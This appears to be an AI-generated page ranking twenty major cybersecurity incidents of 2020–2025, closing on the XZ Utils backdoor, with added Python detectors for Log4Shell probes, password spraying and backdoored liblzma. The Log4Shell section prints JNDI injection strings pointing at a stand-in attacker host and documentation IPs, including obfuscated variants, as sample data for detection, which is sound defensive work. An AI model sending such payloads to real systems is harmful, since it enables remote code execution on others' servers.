Top Cybersecurity Breaches 2020–2025 | Generated by AI
Question: What are the top 20 biggest security news stories in the last 5 years, and does the Andres Freund / XZ Utils SSH delay backdoor discovery count as one of them?
Answer:
Top 20 Biggest Cybersecurity News Stories (2020–2025)
1. 🔓 SolarWinds Supply Chain Attack (Dec 2020)
Beginning in early 2020, a threat actor later attributed to Russia's Foreign Intelligence Service (SVR) inserted a backdoor known as SUNBURST into the build pipeline of SolarWinds' Orion network-management software, so that legitimately signed Orion updates carried the implant to customers. SolarWinds estimates nearly 18,000 customers installed a compromised update; the actor then hand-picked roughly a hundred high-value victims for follow-on intrusion, including the U.S. Treasury, Commerce, Homeland Security and Justice departments and several Fortune 500 companies. The campaign was publicly disclosed in December 2020 after FireEye detected the intrusion in its own network, and it is widely considered one of the most damaging cyber-espionage operations in history.
2. ⛽ Colonial Pipeline Ransomware (May 2021)
Colonial Pipeline halted operations on May 7, 2021, after a ransomware attack by the DarkSide group against its IT systems. The pipeline stretches from Texas to the Northeast and delivers about 45% of the fuel consumed on the East Coast. Reuters reported that the attackers stole more than 100 GB of data before encrypting systems. The company paid roughly $4.4 million in Bitcoin (75 BTC), of which about $2.3 million (63.7 BTC) was later recovered by the U.S. Department of Justice. The shutdown triggered panic buying, fuel shortages across the Southeast, and a federal emergency declaration. The initial access vector was a single compromised VPN password for a legacy account that had no multi-factor authentication.
3. 🪵 Log4Shell / Log4j Vulnerability (Dec 2021)
A zero-day vulnerability in Apache Log4j, a ubiquitous open-source Java logging library, was disclosed in December 2021 and assigned CVE-2021-44228 (Log4Shell). It affected Log4j 2 from version 2.0-beta9 through 2.14.1. Because Log4j evaluated lookup expressions inside the strings it logged, an attacker only had to get a string such as ${jndi:ldap://attacker.example/x} into any field the application logged (a User-Agent header, a username, a chat message). Log4j would then perform a JNDI lookup against the attacker's server and load the Java class it returned, giving unauthenticated remote code execution. With a CVSS score of 10.0 and deployment across a huge share of enterprise Java software, it is considered one of the most critical vulnerabilities ever disclosed; the initial fix in 2.15.0 was itself incomplete and was followed by 2.16.0 and 2.17.0.
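The lookup-in-logged-string mechanism above is what detection rules key on, and attackers quickly learned to obfuscate the ${jndi: token. Below is an added example, not code from the original page or from the Log4j project, that normalizes the common obfuscations seen in the wild (URL encoding, ${lower:}/${upper:} wrapping, and the ${::-x} and ${env:X:-x} default-value tricks) and then flags lines carrying a JNDI lookup. The access-log lines are constructed for the example and use RFC 5737 documentation addresses.

```python
import re
from urllib.parse import unquote

# Inner lookups attackers wrap around letters of "jndi" to defeat naive string matching:
#   ${lower:j} / ${upper:J}          -> j
#   ${::-j}                          -> j  (empty lookup with a default value)
#   ${env:NOPE:-j} / ${sys:nope:-j}  -> j  (missing variable, default value)
_INNER_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"      # group 1: case-conversion wrapper
    r"|\$\{[^${}]*?:-([^${}]*)\}",          # group 2: default-value trick
    re.IGNORECASE,
)

# A JNDI lookup using one of the protocol handlers seen in Log4Shell exploitation
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE
)


def normalize(text: str) -> str:
    """Undo URL encoding (possibly nested) and collapse obfuscating inner lookups
    from the inside out, repeating until the string stops changing."""
    prev = None
    while prev != text:
        prev, text = text, unquote(text)
    prev = None
    while prev != text:
        prev = text
        text = _INNER_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line, once de-obfuscated, contains a JNDI lookup expression."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (index, normalized_line) for every line carrying a JNDI lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed web-server access log (documentation-range IPs, not real traffic).
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.5:1389/a}"',                      # plain probe in User-Agent
    '203.0.113.7 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://198.51.100.5/x}"',          # case-wrapper obfuscation
    '203.0.113.7 - - [10/Dec/2021:14:02:13 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi'
    '%3Armi%3A%2F%2F198.51.100.5%2Fa%7D HTTP/1.1" 200 512',        # URL-encoded ${::-j} trick
    '198.51.100.23 - - [10/Dec/2021:14:02:14 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0"',                                               # benign
    '198.51.100.24 - - [10/Dec/2021:14:02:15 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" '
    '200 1024 "-" "curl/7.68.0"',                                  # a lookup, but not JNDI
]

if __name__ == "__main__":
    for idx, shown in scan(SAMPLE_ACCESS_LOG):
        print(f"line {idx}: {shown}")
```

The normalizer is deliberately simple: it only rewrites the lookup forms that serve as obfuscation wrappers, so a legitimate ${date:...} or ${ctx:...} reference in a logged string is left alone and does not trigger a match.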
4. 🏥 Microsoft Exchange Server Vulnerabilities (Mar 2021)
In early March 2021, Microsoft disclosed active exploitation of four zero-day vulnerabilities in on-premises Microsoft Exchange Server (the chain later known as ProxyLogon), including servers operated by U.S. federal agencies. The White House and allied governments attributed the campaign to actors affiliated with China's Ministry of State Security; Microsoft tracked the initial group as HAFNIUM. The entry point, CVE-2021-26855, was a server-side request forgery that let an unauthenticated attacker send requests the server treated as authenticated; chained with a post-authentication arbitrary file write (CVE-2021-27065), it allowed attackers to drop web shells and take over the server. Tens of thousands of servers worldwide were compromised before patches were widely applied, many by opportunistic actors who piled on once the flaws became public.
5. 🔑 Kaseya VSA Ransomware (Jul 2021)
On July 2, 2021, REvil ransomware affiliates exploited zero-day vulnerabilities in the on-premises VSA remote monitoring and management product sold by U.S. vendor Kaseya. Because VSA is used by managed service providers (MSPs) to administer their customers' systems, the compromised servers pushed ransomware downstream to up to about 1,500 businesses. One of the hardest hit was the Swedish grocery chain Coop, which had to close most of its roughly 800 stores because its point-of-sale systems were encrypted and could not process payments.
6. 🔐 LastPass Data Breach (Aug–Dec 2022)
The LastPass breach unfolded in two stages. In August 2022 an attacker compromised a developer's account and stole source code and internal technical documentation. The attacker then used information from that first intrusion to target a senior DevOps engineer's home computer through a vulnerable third-party media software package, captured the engineer's master password with a keylogger, and obtained the decryption keys for LastPass's cloud storage. That gave access to backups of customer vault data: encrypted usernames, passwords and secure notes, plus unencrypted fields such as website URLs, company names and billing addresses. LastPass disclosed the vault theft in December 2022. Because the encrypted fields are only as strong as each user's master password and key-derivation iteration count, it remains one of the most serious password-manager breaches on record and led to widespread advice to rotate every stored credential.
7. 🧩 Okta Repeated Breaches (2022–2023)
Okta experienced a run of breaches. In January 2022, the LAPSUS$ group compromised a support engineer's laptop at Okta's third-party contractor Sitel; in March 2022 the group published screenshots of Okta's backend administrative consoles and some customer data, and Okta said up to 366 customers could have been affected. In December 2022, Okta's private GitHub repositories were accessed and source code for Okta Workforce Identity Cloud was copied. In October 2023, an attacker used stolen credentials to reach Okta's customer support case management system and downloaded HAR files uploaded by customers that contained live session tokens; Okta first said 134 customers were affected, then disclosed that the attacker had also downloaded a report listing the names and email addresses of every user of the support system.
8. 💊 Change Healthcare Ransomware (Feb 2024)
On February 21, 2024, the ALPHV/BlackCat ransomware gang, which had resumed operations after an FBI disruption in December 2023, attacked Change Healthcare, the UnitedHealth Group subsidiary that processes a large share of U.S. medical claims and pharmacy transactions. The attackers entered through a Citrix remote-access portal using compromised credentials for an account that lacked multi-factor authentication, then spent about nine days inside the network before deploying ransomware. UnitedHealth paid a $22 million ransom. Pharmacies, hospitals and clinics lost claims processing and prescription fulfilment for weeks. CEO Andrew Witty told Congress in May 2024 that roughly one-third of Americans might be affected; UnitedHealth later put the number of people whose data was exposed at approximately 190 million, the largest healthcare data breach in U.S. history.
9. ☁️ CrowdStrike Falcon Update Global IT Outage (Jul 2024)
On July 19, 2024, CrowdStrike pushed a faulty Falcon sensor content update (Channel File 291) that caused Windows hosts to crash with a blue screen on boot. Microsoft estimated that about 8.5 million Windows devices were affected. It was not a cyberattack, but it became one of the largest IT outages in history: flights were grounded worldwide, and hospitals, banks, broadcasters and government services were disrupted. Recovery required hands-on remediation of each crashed machine (deleting the bad channel file from safe mode or the recovery environment), and BitLocker-protected disks made that slower still. The root cause was a mismatch between the number of input fields a sensor template expected (21) and the number the content file supplied (20), which the content validator failed to catch, producing an out-of-bounds memory read in kernel mode.
10. 📱 Salt Typhoon — U.S. Telecom Hack (2024)
During 2024, a Chinese state-linked group tracked as Salt Typhoon was found deep inside AT&T, Verizon, Lumen and other major U.S. telecommunications carriers. In October 2024 it was reported that the intruders had accessed phones used by senior U.S. political figures, including people associated with both presidential campaigns, prompting an FBI investigation and election-security concerns. Subsequent reporting and a joint CISA/FBI advisory revealed that Salt Typhoon had intercepted call and text metadata, and for a smaller set of targets the content of communications, and had accessed the systems carriers use to comply with court-authorized wiretap requests. In response, U.S. agencies urged officials to move to end-to-end encrypted messaging.
11. 🏦 MOVEit Transfer Mass Exploitation (Jun 2023)
Beginning around May 27, 2023, the Cl0p extortion group mass-exploited a zero-day SQL injection vulnerability (CVE-2023-34362) in Progress Software's MOVEit Transfer managed file transfer product, planting web shells and stealing data from hundreds of organizations worldwide, including government agencies, banks, universities and airlines. Rather than encrypting systems, Cl0p relied purely on data-theft extortion. It became the largest single cyberattack campaign of 2023, affecting more than 2,000 organizations and tens of millions of individuals by later counts.
12. 🎰 MGM Resorts / Caesars Casino Attacks (Sep 2023)
In September 2023, cyberattacks took down slot machines, room keys and reservation systems at MGM Resorts' Las Vegas casinos and also hit Caesars Entertainment. The intrusions were carried out by Scattered Spider, a loosely organized group of young native English speakers in the United States and Britain working as affiliates of the Russia-based ALPHV/BlackCat ransomware operation, a pairing widely described as the first of its kind to come to light. The entry point was social engineering: the attackers phoned the IT help desk impersonating an employee they had found on LinkedIn and talked their way into a credential and MFA reset. MGM refused to pay and reported about $100 million in losses; Caesars quietly paid a ransom reported to be around $15 million.
13. 🌨️ Snowflake Cloud Breach (May 2024)
In May 2024 a wave of data theft hit customers of the cloud data platform Snowflake, including AT&T, Ticketmaster (Live Nation), Santander and Advance Auto Parts. Snowflake's own platform was not breached: the attacker, tracked by Mandiant as UNC5537 and linked to the Scattered Spider / "Com" ecosystem, logged into roughly 165 customer accounts using credentials harvested by infostealer malware, in some cases years earlier, that still worked because the accounts had no multi-factor authentication and no network allow-listing. The episode made the case for enforcing MFA and IP restrictions on data-warehouse accounts and for treating infostealer logs as live credential leaks.
14. 📞 AT&T Data Breach (2024)
In July 2024, AT&T disclosed that records of calls and text messages for "nearly all" of its wireless customers from May 1 to October 31, 2022, and on January 2, 2023, had been exfiltrated in April 2024 from its workspace on a third-party cloud platform (the Snowflake campaign above). The stolen metadata included the phone numbers a customer interacted with, call counts and durations, and for some records cell-site identifiers, but not the content of calls or texts, customer names, or Social Security numbers. AT&T reportedly paid about 5.7 Bitcoin (roughly $370,000 at the time) to a member of the hacking group in exchange for a video purporting to show the data being deleted.
15. 💰 Record $75M Ransom Payment — Dark Angels (2024)
In July 2024, Zscaler's ThreatLabz team reported a $75 million ransom payment by an unnamed victim to the Dark Angels ransomware group, the largest publicly known ransomware payment to date. In September, Bloomberg reported that the payment came from pharmaceutical distributor Cencora, a publicly traded Fortune 500 company, following a breach disclosed in February 2024. Dark Angels is notable for targeting a small number of very large companies and stealing huge volumes of data rather than running a high-volume affiliate program.
16. 🔐 LockBit Ransomware Takedown (Feb 2024)
In February 2024, the LockBit ransomware-as-a-service operation was disrupted by Operation Cronos, led by the U.K. National Crime Agency with the FBI, Europol and other partners. Law enforcement seized LockBit's leak site and affiliate panel, took control of its infrastructure, obtained decryption keys for victims, and published details about its affiliates. Although officials described the group as "completely compromised," LockBit resumed posting victims on a new Dark Web address within days, though its affiliate base and reputation were badly damaged.
17. 🏛️ Microsoft Midnight Blizzard Breach (Jan 2024)
In January 2024, Microsoft disclosed that the Russian state actor Midnight Blizzard (APT29, the SVR group behind SolarWinds) had been inside its corporate environment since late November 2023. The intruders gained a foothold with a password spray attack against a legacy, non-production test tenant account that had no multi-factor authentication. From there they abused a legacy test OAuth application that held elevated access to Microsoft's corporate environment, granted it the Office 365 Exchange Online full_access_as_app role, and read email and attachments belonging to senior leadership, cybersecurity and legal staff, apparently looking for what Microsoft knew about the group. Microsoft later said the attacker also used secrets found in those emails to attempt access to other systems, and that some customers' correspondence with Microsoft was taken.
18. 🧬 23andMe Data Breach (Oct 2023)
In October 2023, 23andMe disclosed that attackers had used credential stuffing (replaying username and password pairs leaked from other breaches) to log into about 14,000 customer accounts. Because those accounts had opted into the DNA Relatives feature, the attackers could scrape the profiles of people sharing DNA with them, ultimately exposing data on about 6.9 million users, including ancestry reports and relationship information. Lists targeting users of Ashkenazi Jewish and Chinese ancestry were offered for sale. 23andMe subsequently forced password resets and made two-factor authentication mandatory; the incident underscored the risk of password reuse and of leaving MFA optional.
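Entries 17 and 18 fail in the same place, a password guessed or replayed against an account with no second factor, but the two attacks look different in authentication logs, and that difference is what a detection should key on. The following is an added example, not code from the original page or from Microsoft or 23andMe, run over constructed sign-in events: a password spray is one source trying many accounts once or twice each to stay under lockout thresholds, while credential stuffing is many accounts hit once or twice each from many rotating sources. The thresholds, account names and addresses are illustrative assumptions.

```python
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class AuthEvent:
    ts: datetime
    user: str
    src_ip: str
    success: bool


def detect_password_spray(events, min_users=10, max_per_user=2, window=timedelta(hours=1)):
    """Spray signature: ONE source tries MANY accounts with FEW guesses each.
    Returns one finding per offending source IP, with any account that later
    accepted a login from that same source (the likely compromise)."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e.src_ip].append(e)
    findings = []
    for ip, evs in by_ip.items():
        fails = [e for e in evs if not e.success]
        if not fails:
            continue
        span = max(e.ts for e in fails) - min(e.ts for e in fails)
        per_user = Counter(e.user for e in fails)
        if len(per_user) >= min_users and max(per_user.values()) <= max_per_user and span <= window:
            hits = sorted({e.user for e in evs if e.success})
            findings.append({"src_ip": ip, "accounts_tried": len(per_user), "compromised": hits})
    return findings


def detect_credential_stuffing(events, min_users=10, min_ips=10, max_per_user=2):
    """Stuffing signature: MANY accounts, MANY low-volume sources (proxies or a
    botnet), one or two attempts per account because the attacker already holds
    a leaked pair. Busy sources (sprayers, NAT gateways) are excluded so the two
    detections do not double-count each other."""
    fails_per_user = Counter(e.user for e in events if not e.success)
    events_per_ip = Counter(e.src_ip for e in events)
    low_volume = [
        e for e in events
        if not e.success
        and fails_per_user[e.user] <= max_per_user
        and events_per_ip[e.src_ip] <= max_per_user + 1
    ]
    users = {e.user for e in low_volume}
    ips = {e.src_ip for e in low_volume}
    if len(users) < min_users or len(ips) < min_ips:
        return None
    hits = sorted({e.user for e in events if e.success and e.user in users and e.src_ip in ips})
    return {"accounts_targeted": len(users), "source_ips": len(ips), "compromised": hits}


T0 = datetime(2024, 1, 10, 3, 0, 0)


def constructed_sample():
    """Constructed sign-in telemetry for the example; not real log data."""
    ev = [AuthEvent(T0, "alice", "192.0.2.10", True),
          AuthEvent(T0 + timedelta(hours=8), "alice", "192.0.2.10", True)]
    for i in range(3):  # bob mistypes his password three times, then gets in
        ev.append(AuthEvent(T0 + timedelta(minutes=i), "bob", "192.0.2.11", False))
    ev.append(AuthEvent(T0 + timedelta(minutes=4), "bob", "192.0.2.11", True))
    # Password spray: one source, one guess against each of 12 accounts over ~22 minutes;
    # the legacy test account without MFA accepts the guess.
    targets = [f"user{i:02d}" for i in range(11)] + ["svc-legacy-test"]
    for i, u in enumerate(targets):
        ev.append(AuthEvent(T0 + timedelta(minutes=2 * i), u, "203.0.113.50", False))
    ev.append(AuthEvent(T0 + timedelta(minutes=26), "svc-legacy-test", "203.0.113.50", True))
    # Credential stuffing: 15 leaked pairs replayed from 15 rotating proxies; for three
    # accounts the first leaked password fails and a second one succeeds.
    for i in range(15):
        u, ip = f"member{i:02d}", f"198.51.100.{i + 1}"
        ev.append(AuthEvent(T0 + timedelta(seconds=5 * i), u, ip, False))
        if i % 5 == 0:
            ev.append(AuthEvent(T0 + timedelta(seconds=5 * i + 2), u, ip, True))
    return ev


if __name__ == "__main__":
    sample = constructed_sample()
    print(detect_password_spray(sample))
    print(detect_credential_stuffing(sample))
```

Both detections only reason about volume and distribution, so a single user who fails once from a new IP never trips them; the thresholds exist precisely to separate that background noise from a campaign. In production the same logic would run over a sliding time window and be joined with device and geolocation context.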
19. 🏦 U.S. Treasury / Chinese Hackers Breach (Dec 2024)
In December 2024, the U.S. Treasury Department disclosed that Chinese state-sponsored hackers had accessed Treasury workstations and more than 3,000 unclassified files. The intruders obtained an API key for BeyondTrust, a third-party remote-support SaaS product Treasury used, and abused it to bypass the product's security controls and reach Treasury users' workstations. Targets included the Office of Foreign Assets Control (OFAC), which administers sanctions, and the Office of Financial Research. The intrusion was later linked to the group Microsoft tracks as Silk Typhoon and was treated as a major national security incident.
20. 🔧 XZ Utils Backdoor — CVE-2024-3094 (Mar 2024)
In February and March 2024, a backdoor was introduced into liblzma, the compression library shipped with XZ Utils, in releases 5.6.0 and 5.6.1, by a maintainer account using the name "Jia Tan." On Linux systems where the OpenSSH server is linked against liblzma (indirectly, through distribution patches that link sshd to libsystemd), the backdoor hooks RSA public-key authentication so that an attacker holding a specific Ed448 private key can execute arbitrary commands as root through sshd before authentication completes. The issue was assigned CVE-2024-3094 with a CVSS score of 10.0, the highest possible score.
Does the XZ Utils / Andres Freund Story Count? ✅ Absolutely YES
This is arguably one of the most dramatic security discoveries of the decade. Here’s why it stands out:
The Discovery: Andres Freund, a Microsoft software engineer and PostgreSQL developer, was running PostgreSQL benchmarks on Debian sid when he noticed that sshd was consuming unusual CPU and that SSH logins were taking roughly half a second longer than expected. He investigated, found Valgrind errors pointing into liblzma, and traced the behaviour to malicious code shipped in the XZ Utils release tarballs. He notified the private distros list on 28 March 2024 and published his findings on the Openwall oss-security mailing list on 29 March 2024.
The Scope of the Near-Disaster: Had the backdoor reached stable releases, it would have given its operator pre-authentication remote code execution on a large share of Internet-facing Linux servers, potentially dwarfing the SolarWinds compromise. As it was, the backdoored versions only made it into development and rolling-release channels: Fedora 40 beta and Rawhide, Debian testing and unstable, openSUSE Tumbleweed and Kali Linux, among others. Ubuntu pulled the package from its 24.04 pre-release repositories and delayed the beta; no mainstream stable distribution shipped it.
The Long Game: A subsequent investigation found that the campaign was the culmination of more than two years of effort, from November 2021 to February 2024, by the "Jia Tan" persona and supporting sock-puppet accounts that pressured the project's overworked sole maintainer into handing over co-maintainership and commit rights.
The Method: The malicious logic was not visible in the Git repository. A modified build-to-host.m4 macro, present only in the release tarballs and not in Git, altered the build so that it extracted a payload hidden in two obfuscated binary test files committed to the repository (ostensibly a corrupt and a valid .xz test case) and linked it into liblzma. Ordinary code review of the Git history would therefore not have caught it, which is why comparing release tarballs against the tagged source tree is now a standard recommendation.
The Lucky Break: If Andres Freund had not chased down that half-second delay, the backdoor would likely have propagated into stable distributions and you might be reading about one of the worst supply-chain compromises ever. Most engineers would have shrugged it off; Freund did not.
The XZ Utils story is unique because it was both a near-miss catastrophe and a showcase of how open-source vigilance can catch even the most sophisticated state-level supply chain attacks.
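The practical question for anyone who ran a rolling or testing distribution in March 2024 was simple: is my liblzma one of the two backdoored releases, and does my sshd actually load it? The following is an added example, not code from the original page or from the XZ or OpenSSH projects, that answers both from the output of `xz --version` and `ldd` on the sshd binary. The sample command outputs are constructed for the example (the path /usr/sbin/sshd and the library names are the usual Debian/Fedora ones), and assess_host() runs the real commands when they exist on the machine.

```python
import re
import shutil
import subprocess
from typing import Optional

# Releases carrying the CVE-2024-3094 backdoor
BACKDOORED_VERSIONS = {"5.6.0", "5.6.1"}


def parse_liblzma_version(xz_version_output: str) -> Optional[str]:
    """Pull the library version out of `xz --version` output. The second line
    (liblzma) is the one that matters: sshd loads the library, not the xz binary."""
    m = re.search(r"^liblzma\s+(\d+\.\d+\.\d+)", xz_version_output, re.MULTILINE)
    return m.group(1) if m else None


def is_backdoored_version(version: Optional[str]) -> bool:
    return version in BACKDOORED_VERSIONS


def sshd_pulls_in_liblzma(ldd_output: str) -> bool:
    """The backdoor only reaches sshd when liblzma is in its dependency tree,
    which happens on distributions whose OpenSSH is patched to link libsystemd.
    ldd lists transitive dependencies, so liblzma shows up even though sshd
    never links it directly."""
    return re.search(r"^\s*liblzma\.so", ldd_output, re.MULTILINE) is not None


def assess(xz_version_output: str, ldd_output: str) -> dict:
    """Combine both signals: a backdoored version is bad on its own (rebuild),
    but only an sshd that loads it is remotely exploitable."""
    version = parse_liblzma_version(xz_version_output)
    bad_version = is_backdoored_version(version)
    exposed = bad_version and sshd_pulls_in_liblzma(ldd_output)
    return {"liblzma": version, "backdoored_version": bad_version, "sshd_exposed": exposed}


def assess_host(sshd_path: str = "/usr/sbin/sshd") -> Optional[dict]:
    """Run the real commands on a Linux host; None if xz or ldd is unavailable."""
    if not (shutil.which("xz") and shutil.which("ldd")):
        return None
    xz_out = subprocess.run(["xz", "--version"], capture_output=True, text=True).stdout
    ldd_out = subprocess.run(["ldd", sshd_path], capture_output=True, text=True).stdout
    return assess(xz_out, ldd_out)


# Constructed command outputs for illustration (not captured from a real host).
XZ_VULNERABLE = "xz (XZ Utils) 5.6.1\nliblzma 5.6.1\n"
XZ_REVERTED = "xz (XZ Utils) 5.4.5\nliblzma 5.4.5\n"   # what Debian's rollback reports
LDD_WITH_LZMA = (
    "\tlinux-vdso.so.1 (0x00007ffd5a3f0000)\n"
    "\tlibsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 (0x00007f1c3e200000)\n"
    "\tliblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f1c3e1c0000)\n"
    "\tlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1c3de00000)\n"
)
LDD_WITHOUT_LZMA = (
    "\tlinux-vdso.so.1 (0x00007ffd5a3f0000)\n"
    "\tlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1c3de00000)\n"
)

if __name__ == "__main__":
    print("constructed vulnerable host:", assess(XZ_VULNERABLE, LDD_WITH_LZMA))
    print("constructed reverted host:  ", assess(XZ_REVERTED, LDD_WITH_LZMA))
    print("this host:                  ", assess_host())
```

A version string is a weak indicator on its own (a distribution can ship a patched 5.6.1 or, as Debian did, a 5.6.1+really5.4.5 package), so treat a hit as a prompt to compare the installed library against the distribution's fixed package rather than as proof of compromise.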
References:
- CSIS Significant Cyber Incidents
- TechTarget: 10 Biggest Cybersecurity Stories of 2024
- XZ Utils Backdoor – Wikipedia
- Akamai: XZ Utils Backdoor – Everything You Need to Know
- SoftwareSeni: XZ Utils Backdoor and Multi-Year Social Engineering Campaign
- Internet Nearly Collapsed From XZ Backdoor – andrewbaker.ninja
- GAO: SolarWinds Cyberattack
- Fortinet: Recent Cyber Attacks
- TechRepublic: Cybersecurity News Roundup 2024